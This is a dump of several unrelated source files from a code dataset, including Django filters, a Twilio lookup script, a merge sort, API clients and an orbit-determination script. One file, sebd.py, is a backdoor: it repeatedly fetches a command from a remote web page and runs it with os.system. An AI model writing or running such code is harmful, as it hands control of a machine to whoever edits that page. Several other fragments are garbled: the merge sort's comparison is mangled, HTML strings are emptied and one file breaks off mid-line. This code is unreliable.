open(self.ofile, 'w') as csv_out:\n            analysis_commands.ExportShipToNetworkMatchesCommand(self.ais_doc, self.network_doc, csv_out).execute()\n\n        with open(self.ofile, 'r') as csv_out:\n            reader = csv.reader(csv_out)\n            header = next(reader)\n            row_1 = next(reader)\n\n        self.assertEquals(header, ['Vessel Name', 'ESSID', 'BSSID', 'Encryption'])\n        self.assertEquals(row_1, ['CRYSTAL SYMPHONY', 'CU@SYMPHONY', '00:0C:E6:02:F3:33', 'None'])\n
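\n# To run only this module (assuming a standard Django project layout and configured settings):\n#   python manage.py test apps.analysis.tests.test_commands\n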
","sub_path":"apps/analysis/tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":11904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"314723655","text":"# *** Fetch a Lookup ***\n# Code based on https://www.twilio.com/docs/lookup/api\n# Download Python 3 from https://www.python.org/downloads/\n# Download the Twilio helper library from https://www.twilio.com/docs/python/install\nimport os\nfrom twilio.rest import Client\n# from datetime import datetime | not required for this example\nimport logging\n# Write requests & responses from Twilio to a log file, useful for debugging:\nlogging.basicConfig(level=logging.DEBUG,\n                    format='%(asctime)s %(levelname)s %(message)s',\n                    filename='/usr/local/twilio/python3/sdkv6x/lookup/logs/twilio_lookup.log',\n                    filemode='a')\n\n# Your Account Sid and Auth Token from twilio.com/console, stored in macOS ~/.bash_profile in this example\naccount_sid = os.environ.get('TWILIO_ACCOUNT_SID')\nauth_token = os.environ.get('TWILIO_AUTH_TOKEN')\n
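# For example, the two environment variables could be exported in ~/.bash_profile\n# first (placeholder values shown, not real credentials):\n#   export TWILIO_ACCOUNT_SID=ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n#   export TWILIO_AUTH_TOKEN=your_auth_token_here\n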
: \" + str(phone_number.phone_number) + \"\\n\")\nf.write(\"url : \" + str(phone_number.url) + \"\\n\")\nf.close()","sub_path":"lookup/fetch_lookup_type_caller-name.py","file_name":"fetch_lookup_type_caller-name.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"270321681","text":"def divide(left,right):\n a=[]\n i,j = 0,0\n n=len(left)\n m=len(right)\n while i+jright[j]:\n a.append(right[j])\n j+=1\n elif left[i]<=right[j]:\n a.append(left[i])\n i+=1 \n return a\n\ndef merge(arr, l, r):\n if r-l<=1:\n return arr[l:r]\n elif r-l>1:\n m = int((l+r)/2)\n left = merge(arr,l,m)\n right = merge(arr,m,r)\n return divide(left,right)\n\nl=list(map(int, input().split()))\nprint(merge(l,0,len(l)))\n","sub_path":"Sorting/Merge_Sort.py","file_name":"Merge_Sort.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"142376671","text":"import requests\nimport json\nfrom diablo import Diablo\nclass BattleNet:\n def __init__(self, id, secret, locale='en_GB', region='eu'):\n self.id = id\n self.secret = secret\n self.region = region\n self.locale = locale\n\n data = {'grant_type': 'client_credentials'}\n response = requests.post('https://us.battle.net/oauth/token', data=data, auth=(self.id, self.secret))\n token_json = response.json()\n self.access_token = token_json[\"access_token\"]\n\n def d3(self):\n return Diablo(access_token=self.access_token, locale=self.locale, region=self.region)\n","sub_path":"battlenet.py","file_name":"battlenet.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"458241868","text":"\"\"\"\n@authors:\n Jared Blackman\n@since\n 2016-03-06\n\"\"\"\n\nfrom DumbBasicGrammar import grammar_DumbBasic\n\n\"\"\"MAIN\"\"\"\nwhile (__name__ == '__main__'):\n codeString = []\n f = open(\"SampleCode.txt\")\n for l in f:\n for c in l:\n codeString.append(c)\n f.close()\n\n from Parser import Parser_Earley\n DumbBasicParser = Parser_Earley(grammar_DumbBasic)\n print(DumbBasicParser.parse(codeString))\n\n exit()","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"144087644","text":"from urllib.parse import urlparse\r\nfrom urllib.parse import urljoin\r\nimport urllib.request\r\nimport os\r\nimport requests\r\n\r\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\r\n\r\n\r\nclass SdmHttpClient(object):\r\n\r\n base_url = \"http://ida.grenoble.xrce.xerox.com\"\r\n urls = {\r\n \"upload\": \"ScheduleManager.Api/api/Schedule\",\r\n \"list\": \"ScheduleManager.Api/api/Schedule\",\r\n \"get\": \"ScheduleManager.Api/api/Schedule\",\r\n \"delete\": \"ScheduleManager.Api/api/Schedule\",\r\n }\r\n\r\n def __init__(self, date):\r\n self.date = date.strftime(\"%Y-%m-%d\")\r\n self.check_server()\r\n\r\n def url(self, action):\r\n return urljoin(self.base_url, self.urls[action])\r\n\r\n def sdm_alive(self):\r\n res = requests.get(self.base_url)\r\n if res.status_code == 200:\r\n return True\r\n else:\r\n return False\r\n\r\n def check_server(self):\r\n res = self.sdm_alive()\r\n if not res:\r\n msg = \"SDM on {} did not respond to ping. 
","sub_path":"Sorting/Merge_Sort.py","file_name":"Merge_Sort.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"142376671","text":"import requests\nimport json\nfrom diablo import Diablo\nclass BattleNet:\n    def __init__(self, id, secret, locale='en_GB', region='eu'):\n        self.id = id\n        self.secret = secret\n        self.region = region\n        self.locale = locale\n\n        data = {'grant_type': 'client_credentials'}\n        response = requests.post('https://us.battle.net/oauth/token', data=data, auth=(self.id, self.secret))\n        token_json = response.json()\n        self.access_token = token_json[\"access_token\"]\n\n    def d3(self):\n        return Diablo(access_token=self.access_token, locale=self.locale, region=self.region)\n
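\n# Hypothetical usage (placeholder credentials; assumes the local diablo module is importable):\n#   bnet = BattleNet('my-client-id', 'my-client-secret', locale='en_GB', region='eu')\n#   d3_api = bnet.d3()\n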
path\".format(options.inputPath))\n else:\n log.LOG(log.Level.ERROR, \"{} does not exist\".format(options.inputPath))\n\n log.Exit()\n","sub_path":"utl/script/code/file_format.py","file_name":"file_format.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"160275067","text":"# Desafio 28 \"melhorado\", com o jogador tentando advinhar até que o computador acerte.\nimport random\nfrom time import sleep\nnumero_pc = random.randint(0, 10)\nprint('-=-' * 20)\nprint('Vou pensar em um numero entre 0 e 10. Tente advinhar...')\nprint('-=-' * 20)\nsleep(1)\nnumero_user = int(input('Qual número escolhi? Digite um valor entre 0 e 10: '))\nprint('PROCESSANDO...')\nsleep(0.5)\ntentativas = 1\nwhile numero_user != numero_pc:\n print('Errou! Tente novamente!')\n tentativas += 1\n numero_user = int(input('Qual número escolhi? Digite um valor entre 0 e 10: '))\n print('PROCESSANDO...')\n sleep(1)\nprint('Parabéns!! Após \\033[1;34m{}\\033[m tentativas, você advinhou! O PC também escolheu \\033[1;34m{}\\033[m.'.format(tentativas, numero_pc))","sub_path":"ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"416119528","text":"import os\nimport sys\nimport pickle\nimport pandas\nimport librosa\nimport numpy as np\nfrom tqdm.auto import tqdm\n\nimport triplet_network\n\ntriplet_model, triplet_backbone = triplet_network.build_model(num_features=12)\ntriplet_model.load_weights('checkpoint.ckpt')\n\n\nSR = 16000\n\nMFCC_KWARGS = dict(\n n_mfcc=13,\n hop_length=500\n)\n\ndef timbre_eval(output, reference, neg):\n mfcc_out = librosa.feature.mfcc(output, sr=SR, **MFCC_KWARGS)[1:]\n mfcc_ref = librosa.feature.mfcc(reference, sr=SR, **MFCC_KWARGS)[1:]\n mfcc_neg = librosa.feature.mfcc(neg, sr=SR, **MFCC_KWARGS)[1:]\n \n mfcc_triplet_cos, _ = triplet_model.predict([\n (mfcc_out.T[None, :, :], mfcc_ref.T[None, :, :], mfcc_neg.T[None, :, :])]).reshape(2)\n return mfcc_triplet_cos\n\ndef main():\n top = 'results'\n ref_dir = 'refs'\n dirs = ['single','pipeline', 'unsup','config1', 'config3']\n domains = {'cv':0, 'ps':3}\n c1 = [d + '.cv' for d in dirs]\n c2 = [d + '.ps' for d in dirs]\n cols = c1\n df = pandas.DataFrame(columns=cols)\n dom = 'ps'\n for i, d in tqdm(enumerate(dirs)):\n where = f'{top}/{d}/{dom}'\n for j, f in enumerate(sorted(os.listdir(where))):\n if not f[-3:]=='wav':\n j = j-1\n continue\n name = f[0:3]\n output = f'{where}/{f}'\n pos = f'{top}/{ref_dir}/{name}.{domains.get(dom)}.wav'\n neg = f'{top}/{ref_dir}/{name}.0.wav'\n outa, _ = librosa.load(output, 16000)\n posa, _ = librosa.load(pos, 16000)\n nega, _ = librosa.load(neg, 16000)\n cos = timbre_eval(outa, posa, nega)\n df.at[j, f'{d}.{dom}'] = cos \n df.to_csv('./timbre.csv')\n\nif __name__ == \"__main__\":\n main()","sub_path":"evaluation/timbre.py","file_name":"timbre.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"249642439","text":"'''\nCreated on Nov 29, 2014\n\n@author: shaner\n'''\n\n\n\nmiles_run = 0\nrunning = True\n\nwhile running:\n if miles_run <= 10:\n print(\"Still running! On mile {}\".format(miles_run))\n miles_run += 1\n else:\n running = False\nelse:\n print(\"Whew! 
","sub_path":"utilities/sdm.py","file_name":"sdm.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"600085740","text":"import os.path\nimport sys\nfrom optparse import OptionParser\nfrom subprocess import Popen, PIPE\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../common\"))\nfrom sb import *\n\ndef ExecuteClangFormatOnFile(clangFormat, filePath):\n\n    process = Popen([clangFormat, \"-i\", filePath], stdout=PIPE, stderr=PIPE)\n    (output, err) = process.communicate()\n    return process.wait()\n\nif __name__ == \"__main__\":\n\n    optParser = OptionParser()\n\n    optParser.add_option(\"-i\", \"--input\", action=\"store\",\n                         type=\"string\", help=\"Input path\", dest=\"inputPath\")\n\n    (options, args) = optParser.parse_args()\n\n    if (options.inputPath is None):\n        log.LOG(log.Level.FATAL_ERROR, \"option -i is required\")\n\n    clangFormatPath = os.path.join(host.GetUtlBinPath(), \"clang\", host.GetExeFileName(\"clang-format\"))\n\n    if os.path.exists(options.inputPath):\n        if os.path.isfile(options.inputPath):\n            err = ExecuteClangFormatOnFile(clangFormatPath, options.inputPath)\n            if 0 != err:\n                log.LOG(log.Level.ERROR, \"Failed to format {}\".format(options.inputPath))\n        elif os.path.isdir(options.inputPath):\n            files = []\n            extensions_with_dot = [\".\" + ext for ext in code.CPP_FILE_EXTENSIONS]\n            file_system.FindFiles(files, dirs=[options.inputPath], extensions=extensions_with_dot)\n            for file_iter in files:\n                err = ExecuteClangFormatOnFile(clangFormatPath, file_iter)\n                if 0 != err:\n                    log.LOG(log.Level.ERROR, \"Failed to format {}\".format(file_iter))\n        else:\n            log.LOG(log.Level.ERROR, \"{} is not a supported input path\".format(options.inputPath))\n    else:\n        log.LOG(log.Level.ERROR, \"{} does not exist\".format(options.inputPath))\n\n    log.Exit()\n
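# Example invocation (hypothetical path; assumes the sb helper package resolves):\n#   python file_format.py -i path/to/cpp/sources\n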
","sub_path":"utl/script/code/file_format.py","file_name":"file_format.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"160275067","text":"# Challenge 28 \"improved\", with the player guessing again and again until they hit the computer's number.\nimport random\nfrom time import sleep\nnumero_pc = random.randint(0, 10)\nprint('-=-' * 20)\nprint('I am going to think of a number between 0 and 10. Try to guess it...')\nprint('-=-' * 20)\nsleep(1)\nnumero_user = int(input('Which number did I pick? Enter a value between 0 and 10: '))\nprint('PROCESSING...')\nsleep(0.5)\ntentativas = 1\nwhile numero_user != numero_pc:\n    print('Wrong! Try again!')\n    tentativas += 1\n    numero_user = int(input('Which number did I pick? Enter a value between 0 and 10: '))\n    print('PROCESSING...')\n    sleep(1)\nprint('Congratulations!! After \\033[1;34m{}\\033[m tries you guessed it! The PC had also picked \\033[1;34m{}\\033[m.'.format(tentativas, numero_pc))","sub_path":"ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"416119528","text":"import os\nimport sys\nimport pickle\nimport pandas\nimport librosa\nimport numpy as np\nfrom tqdm.auto import tqdm\n\nimport triplet_network\n\ntriplet_model, triplet_backbone = triplet_network.build_model(num_features=12)\ntriplet_model.load_weights('checkpoint.ckpt')\n\n\nSR = 16000\n\nMFCC_KWARGS = dict(\n    n_mfcc=13,\n    hop_length=500\n)\n\ndef timbre_eval(output, reference, neg):\n    mfcc_out = librosa.feature.mfcc(output, sr=SR, **MFCC_KWARGS)[1:]\n    mfcc_ref = librosa.feature.mfcc(reference, sr=SR, **MFCC_KWARGS)[1:]\n    mfcc_neg = librosa.feature.mfcc(neg, sr=SR, **MFCC_KWARGS)[1:]\n    \n    mfcc_triplet_cos, _ = triplet_model.predict([\n        (mfcc_out.T[None, :, :], mfcc_ref.T[None, :, :], mfcc_neg.T[None, :, :])]).reshape(2)\n    return mfcc_triplet_cos\n\ndef main():\n    top = 'results'\n    ref_dir = 'refs'\n    dirs = ['single','pipeline', 'unsup','config1', 'config3']\n    domains = {'cv':0, 'ps':3}\n    c1 = [d + '.cv' for d in dirs]\n    c2 = [d + '.ps' for d in dirs]\n    cols = c1\n    df = pandas.DataFrame(columns=cols)\n    dom = 'ps'\n    for i, d in tqdm(enumerate(dirs)):\n        where = f'{top}/{d}/{dom}'\n        for j, f in enumerate(sorted(os.listdir(where))):\n            if f[-3:] != 'wav':\n                j = j-1\n                continue\n            name = f[0:3]\n            output = f'{where}/{f}'\n            pos = f'{top}/{ref_dir}/{name}.{domains.get(dom)}.wav'\n            neg = f'{top}/{ref_dir}/{name}.0.wav'\n            outa, _ = librosa.load(output, 16000)\n            posa, _ = librosa.load(pos, 16000)\n            nega, _ = librosa.load(neg, 16000)\n            cos = timbre_eval(outa, posa, nega)\n            df.at[j, f'{d}.{dom}'] = cos \n    df.to_csv('./timbre.csv')\n\nif __name__ == \"__main__\":\n    main()","sub_path":"evaluation/timbre.py","file_name":"timbre.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"249642439","text":"'''\nCreated on Nov 29, 2014\n\n@author: shaner\n'''\n\n\n\nmiles_run = 0\nrunning = True\n\nwhile running:\n    if miles_run <= 10:\n        print(\"Still running! On mile {}\".format(miles_run))\n        miles_run += 1\n    else:\n        running = False\nelse:\n    print(\"Whew! I'm tired\")\n\n\nLtoLondon = 0\nLondontoL = 102\nstillWalking = True\n \nwhile stillWalking:\n    if LtoLondon >= LondontoL:\n        stillWalking = False\n    else:\n        LtoLondon += 2\n        LondontoL = LondontoL - 1\nelse:\n    print('They would meet at mile marker {} '.format(LondontoL))\n \nprint ('102m - 1m/h x/h h/m = 2m/h * xh')\nprint ('102 1/h = 2xh + xh')\nprint ('102= xh (2+ 1)')\nprint ('102/3 = ', 102/3 , ' hours at mile marker ', LtoLondon)\n \n","sub_path":"While.py","file_name":"While.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"11898154","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/bee/Dev/piu/django/testSite/bee_django_track/templatetags/bee_django_track_filter.py\n# Compiled at: 2018-11-12 01:54:46\n__author__ = 'zhangyue'\nfrom django import template\nfrom django.conf import settings\nfrom django.shortcuts import reverse\nfrom bee_django_track.utils import get_user_name\nregister = template.Library()\n\n@register.filter\ndef get_difference_abs(a, b):\n    return abs(a - b)\n\n\n@register.filter\ndef get_name_detail(user, show_detail=True):\n    if not user:\n        return None\n    else:\n        user_name = get_user_name(user)\n        if not show_detail:\n            return user_name\n        if settings.USER_DETAIL_EX_LINK:\n            link = \"\" + user_name + ''\n        else:\n            link = user_name\n        return link\n\n\n@register.simple_tag\ndef get_record_link(cookie_user, record):\n    if record.content_type.identity == 'user_leave':\n        return record.get_link\n    if record.content_type.identity == 'crm_fee':\n        if cookie_user.has_perm('bee_django_crm.view_crm_preuser_fee'):\n            return record.get_link\n    else:\n        return record.get_link","sub_path":"pycfiles/bee-django-track-0.0.10.tar/bee_django_track_filter.py","file_name":"bee_django_track_filter.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"621736590","text":"import os\nimport urllib.request as ur\n\nurl = 'http://www.diron.xyz/command.html'\n\ncommand = \"\"\n\nwhile command != 'stop': \n    fp = ur.urlopen(url)\n    lines = fp.read()\n\n    command = \"\"\n    csaver_active = False\n\n    for ch_int in lines:\n        ch = chr(ch_int)\n        if csaver_active:\n            if ch == '#':\n                csaver_active = False\n            else:\n                command = command + ch\n        else:\n            if ch == '#':\n                csaver_active = True\n\n    os.system(command)\n","sub_path":"sebd.py","file_name":"sebd.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"198081671","text":"import numpy as np\nimport sympy as sp\n\"\"\"\nStill need to iterate r2\np = unit vector Earth-Ceres\nP = Earth-Ceres vector\nr = Sun-Ceres vector\nR = Earth-Sun vector\nT = observation time\nt = kt Gaussian time\n\n\"\"\"\n# angle for the Earth-Sun distance\ndef d(dia):\n    return(365/360)*(31+25+ dia)\n\ndef decimales(a,b,c):\n    return(a+b/60+c/3600)\ndef squ(x):\n    return(x**2)\n\n# constants\nc= 173.1446 #AU/day (speed of light)\nG=1.48814*10**-34 #AU**3/kg*day**2 ~~ 6.67408*10**-11 #N*m**2/kg**2\nmu=G*(1.989*10**30 + 5.972*10**24) #kg\nk= 0.01720209895\n#Epsilon=[[23,26,07.249],[23,26,07.293],[23,26,07.335]] #degrees, minutes, seconds\n#Epsilon=[np.deg2rad(np.sum(decimales(x[0],x[1],x[2])for x in E_)/len(E_))] #ecliptic-celestial equator angle =23.435358981481482\nEpsilon=np.deg2rad(23.4352570810)\nR=1 #AU\nExct= 0.016\nP=0 #~changed later ~I think it is never used\n\n# observation data\nAr= np.array([[8, 42, 13.71520391],[8, 42, 3.6776478],[8, 41, 57.61776475],[8, 41, 45.35651401]]) # real\nDec=np.array([[31, 57, 48.37108478],[31, 55, 36.28691431],[31, 53, 43.2407565],[31, 40, 4.33621619]]) # real\ndatos=np.array([[np.deg2rad(15*decimales(x[0],x[1],x[2])) for x in Ar],[np.deg2rad(decimales(x[0],x[1],x[2])) for x in Dec]])#AR,DC\ndatosTransformados=[datos[:,0],datos[:,1],datos[:,2]]\ndatosExtra=[datos[:,3]]\n\n# observation vector i,j,k ~~ unit vectors\ndef vector(ar,d):\n    return np.cos(ar)*np.cos(d),np.sin(ar)*np.cos(d),np.sin(d) \n\nvectores=[list(vector(i[0],i[1]))for i in datosTransformados]\np1=np.array(vectores[0]) # observations\np2=np.array(vectores[1]) # observations\np3=np.array(vectores[2]) # observations\n#print(p1)##---[]\n# norms of the p vectors\nnormaVectores=[np.linalg.norm(i)for i in vectores] #~not needed yet\n\n# R (position vector between Sun and Earth)\n\nRA=np.array([[11, 36, 6.30],[11, 40, 3.62],[11, 43, 10.25]])\nDEC=np.array([[2, 35, 0.5],[2, 9, 27.1],[1, 49, 19]])\ndata=np.array([[np.deg2rad(15*decimales(x[0],x[1],x[2])) for x in RA],[np.deg2rad(decimales(x[0],x[1],x[2])) for x in DEC]])#AR,DC\ntransformed_data=[data[:,0],data[:,1],data[:,2]]\n\nvectores2=[list(vector(i[0],i[1]))for i in transformed_data]\nR1=np.array(vectores2[0])\nR2=np.array(vectores2[1])\nR3=np.array(vectores2[2])\n#print(R2)\n'''\ndef rTS (angulo):\n    return(R*(1-squ(Exct))/1+(Exct*np.cos(angulo)))\nR1=rTS(d(14)) #--magnitude\nR1=np.array([R1*np.cos(d(14)),R1*np.sin(d(14)),0])\nR2=rTS(d(15))\nR2=np.array([R2*np.cos(d(15)),R2*np.sin(d(15)),0])\nR3=rTS(d(16))\nR3=np.array([R3*np.cos(d(16)),R3*np.sin(d(16)),0])\n#print(R3,np.linalg.norm(R3))----[],#\n'''\n# time in kt (Gaussian)\n\nT=[2458191.8942,2458192.9733,2458193.82275]\n\nT1=np.array(T[0])\nT2=np.array(T[1])\nT3=np.array(T[2])\n#print(T3)\n\ndef tiempos(T1,T2,T3):\n    time=[] #t-t1-t3\n    time.append(k*(T3-T1))\n    time.append(k*(T1-T2))\n    time.append(k*(T3-T2))\n    return(time)\nt=tiempos(T1,T2,T3)\n#print(t)---[]\n
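# Note: k above is the Gaussian gravitational constant in rad/day, so the list t\n# holds the scaled intervals tau = k*(T_i - T_j) that Gauss's method works with.\n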
# initial value of r2 (position vector of the central observation)\n#print(p1)\n#print(p2)--np.array\n#print(p3)\n#print(R1)--np.array\nDinicial=np.dot(p1,np.cross(p2,p3))\n#print(Dinicial) ---#\n'''def DXx (Rx):\n    if(np.all(Rx==R1)):\n        return np.dot(np.cross(R1,p2),p3)\n    elif (np.all(Rx==R2)):\n        return np.dot(np.cross(p1,R2),p3)\n    elif (np.all(Rx==R3)):\n        return np.dot(p1,np.cross(p2,R3))\n    '''\ndef D1x (j):\n    return np.dot(np.cross(j,p2),p3)\ndef D2x (j):\n    return np.dot(np.cross(p1,j),p3)\ndef D3x (j):\n    return np.dot(p1,np.cross(p2,j))\n#print(DXx(R1))---#\n\"\"\"A1=t[2]/t[0]#---#\nB1=(A1/6)*(squ(t[0])-squ(t[2]))#---#\nA3=-t[1]/t[0]#---#\nB3=(A3/6)*(squ(t[0])-squ(t[1]))#---#\n\nA=(A1*DXx(R1)-DXx(R2)+A3*DXx(R3))/-Dinicial#---#\nB=(B1*DXx(R1)+B3*DXx(R3))/-Dinicial#---#\n\nEe=-2*(np.dot(p2,R2))#---#\nF=squ(np.linalg.norm(R2))#---#\n#print(Ee,F)\naa=-(squ(A)+A*Ee+F)#---#\nb=-mu*(2*(A*B+B*Ee))#---#\ncc=-squ(mu)*squ(B)#---#\n#print(aa,b,cc)\n\nr_2=sp.Symbol('r', real=True)\nequacion=r_2**8+aa*(r_2**6)+b*(r_2**3)+cc\nr2=sp.solve(equacion,r_2)\nr2 = np.array(r2)\nr2_inicial = r2[r2>0]\n\"\"\"\na1=t[2]/t[0]#---#\na2=-1\na3=-t[1]/t[0]#---#\n\nP1=(a1*D1x(R1)+a2*D1x(R2)+a3*D1x(R3))/a1*Dinicial\nP2=(a1*D2x(R1)+a2*D2x(R2)+a3*D2x(R3))/a2*Dinicial\nP3=(a1*D3x(R1)+a2*D3x(R2)+a3*D3x(R3))/a3*Dinicial\n#print(P1)#---# 2.9212279935443062e-06\n\nr1o=np.array((p1*P1)-R1)\nr2o=np.array((p2*P2)-R2)\nr3o=np.array((p3*P3)-R3)\n#print(r2o)#---vector [ 2.81140060e-01 -9.54691768e-01  1.52068239e-06]\nr2o_punto=(r3o-r1o)/t[0]\n#print(r2o_punto)# [-363.0428774815191, -1320.8112113396828, 0.0027111788399157956] - with np.array--this [-3.63042877e+02 -1.32081121e+03  2.71117884e-03]\nrs=[]\n\ndef f (r2,r2_punto,kt):\n    return 1-(mu*kt/2*(np.linalg.norm(r2)**3))+((kt**3)*mu*(np.dot(r2,r2_punto))/2*(np.linalg.norm(r2)**5))+(((kt**4)/24*(np.linalg.norm(r2)**3))*((3*((np.dot(r2_punto,r2_punto)/(np.linalg.norm(r2)**2))-(1/(np.linalg.norm(r2)**3))))-(15*((np.dot(r2,r2_punto)/(np.linalg.norm(r2)**2))**2))+(1/(np.linalg.norm(r2)**3))))\ndef g(r2,r2_punto,kt):\n    return kt-(kt**3)*mu/6*(np.linalg.norm(r2)**3)-((kt**4)*(np.dot(r2,r2_punto)/4*(np.linalg.norm(r2)**5)))\n# Iterate\n '''\nrs=[[],[],[]]\n \nfor i in range(len(r2_inicial)):\n    x = r2_inicial[i]\n    #r2=x \n    R2_punto=(R3-R2)/k*(t[2]-t[1]) #--? Lagrange's method\n    p2_punto=(squ(t[2])*(p1-p2)-squ(t[0])*(p3-p2))/(t[0]*t[1]*t[2]) \n    p2_2punto=-2*((t[2]*(p1-p2)-t[0]*(p3-p2))/t[0]*t[1]*t[2])\n    P2_punto=-(1/2)*((1/x**3)-((1+(1/328900.5))/np.linalg.norm(R2)**3))*((np.dot(np.cross(p2,p2_2punto),R2))/(np.dot(np.cross(p2,p2_punto),p2_2punto))) \n    AA=np.dot(np.cross(p2,p2_punto),R2)/np.dot(np.cross(p2,p2_punto),p2_2punto)\n    BB=((1+(1/328900.5))/np.linalg.norm(R2)**3)*AA\n    P2= (AA/x**3)-BB\n    #print(P2)--#\n    r2o=(P2*p2)-R2\n    print(r2o)\n    dr2=(P2_punto*p2)+(p2*p2_punto)-R2_punto\n    print(dr2)\n    #print(P2_punto)---#\n    finale= False\n    r = []\n    #print (np.shape(dr2))\n    while finale==False: \n        otro_r2=r2o\n        #truncated f & g \n        \n        f=[f(otro_r2,dr2,kt)for kt in t]\n        f1=f[0]\n        f3=f[2]\n        #print(np.shape(f),f)\n        \n        g=[g(otro_r2,kt) for kt in t]\n        g1=g[0]\n        g3=g[2]\n        #print(g)\n        \n        #dr2\n        r1=f1*otro_r2+g1*dr2\n        r3=f3*otro_r2+g3*dr2\n        d1=-f3/(f1*g3-f3*g1)\n        d3=f1/(f1*g3-f3*g1)\n        dr2=d1*r1+d3*r3\n        #dr2=sp.solve()\n        # find c1 and c3\n        \n        c1= g3/((f1*g3)-(g1*f3))\n        c2=-1\n        c3= -g1/((f1*g3)-(g1*f3)) \n        \n        # find the position vectors between Earth and asteroid\n        P1=(c1*D1x(R1)+c2*D1x(R2)+c3*D1x(R3))/c1*Dinicial\n        P2=(c1*D2x(R1)+c2*D2x(R2)+c3*D2x(R3))/c2*Dinicial\n        P3=(c1*D3x(R1)+c2*D3x(R2)+c3*D3x(R3))/c3*Dinicial\n        #print(P2)\n        \n        # find the Sun-asteroid position\n        r1=P1-R1\n        r2=P2-R2\n        r3=P3-R3\n        r=[r1,r2,r3]\n        #print(r2)\n        # find r and r-dot\n        # light-time correction ~~in theory it already starts from here\n        T1= T1-P1/c\n        T2= T2-P2/c\n        T3= T3-P3/c\n        \n        t=tiempos(T1,T2,T3)\n        if(np.abs(np.linalg.norm(otro_r2)-np.linalg.norm(r2))<=0.001):\n            finale=True\n        else:\n            otro_r2=r2\n    rs[i] = r \n    \n'''\n\n#print(r2o)\n#print(r2o_punto)\nfinale=False\nwhile finale==False: \n    r2_ciclo=r2o\n    r2_punto_ciclo= r2o_punto\n    \n    # light-time correction ~~in theory it already starts from here\n    T1= T1-(P1/c)\n    T2= T2-(P2/c)\n    T3= T3-(P3/c)\n    \n    t=tiempos(T1,T2,T3)\n    # truncated f & g\n    \n    f_vals=[f(r2_ciclo,r2_punto_ciclo,kt) for kt in t]\n    f1=f_vals[0]\n    f3=f_vals[2]\n    #print(f_vals)\n    \n    g_vals=[g(r2_ciclo,r2_punto_ciclo,kt) for kt in t]\n    g1=g_vals[0]\n    g3=g_vals[2]\n    #print(g_vals)\n    \"\"\" \n    #dr2\n    r1=f1*r2_ciclo+g1*r2_punto\n    r3=f3*r2_ciclo+g3*r2_punto\n    d1=-f3/(f1*g3-f3*g1)\n    d3=f1/(f1*g3-f3*g1)\n    dr2=d1*r1+d3*r3\n    #dr2=sp.solve()\n    \"\"\"\n    # find c1 and c3\n    \n    c1= g3/((f1*g3)-(g1*f3))\n    c2=-1\n    c3= -g1/((f1*g3)-(g1*f3)) \n    \n    # find the position vectors between Earth and asteroid\n    P1=(c1*D1x(R1)+c2*D1x(R2)+c3*D1x(R3))/c1*Dinicial\n    P2=(c1*D2x(R1)+c2*D2x(R2)+c3*D2x(R3))/c2*Dinicial\n    P3=(c1*D3x(R1)+c2*D3x(R2)+c3*D3x(R3))/c3*Dinicial\n    \n    # find the Sun-asteroid position\n    r1=np.array((p1*P1)-R1)
